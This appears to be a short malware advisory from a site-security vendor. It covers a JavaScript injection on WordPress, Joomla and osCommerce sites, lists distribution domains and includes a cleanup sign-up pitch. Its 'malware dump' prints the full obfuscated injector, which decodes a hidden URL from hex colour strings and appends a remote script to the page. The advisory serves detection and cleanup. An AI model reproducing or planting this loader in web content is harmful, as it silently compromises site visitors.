Description:
A malicious javascript file was found inside the site content and is being used to distribute malware (from xpthexceexp.com and other domains). Any user visiting the infected site could be compromised (desktop antivirus will flag it as the HTTP Malicious Toolkit or Blackhole exploit- depending on the intermediary domains).
Domains used in this attack:
xpthexceexp.com
http://www.dayco.fr/ext/
labource.ru
qoogledns.com
(and many others)
Affecting:
WordPress, Joomla and osCommerce sites.
Clean up:
This malware is generally hidden inside the database (wp-content table). Sign up here to get it clean up: Signup
Malware dump (sample of malware):
<script>
function vdch() {
if(document.all.length > 3) {
var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029');
var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }
var dch = document.createElement("script");
dch.id = "dchid";
dch.src = dchid;
document.all[3].appendChild(dch);
} else {
setTimeout("vdch()",500);
}
} setTimeout("vdch()",500);
</script><script>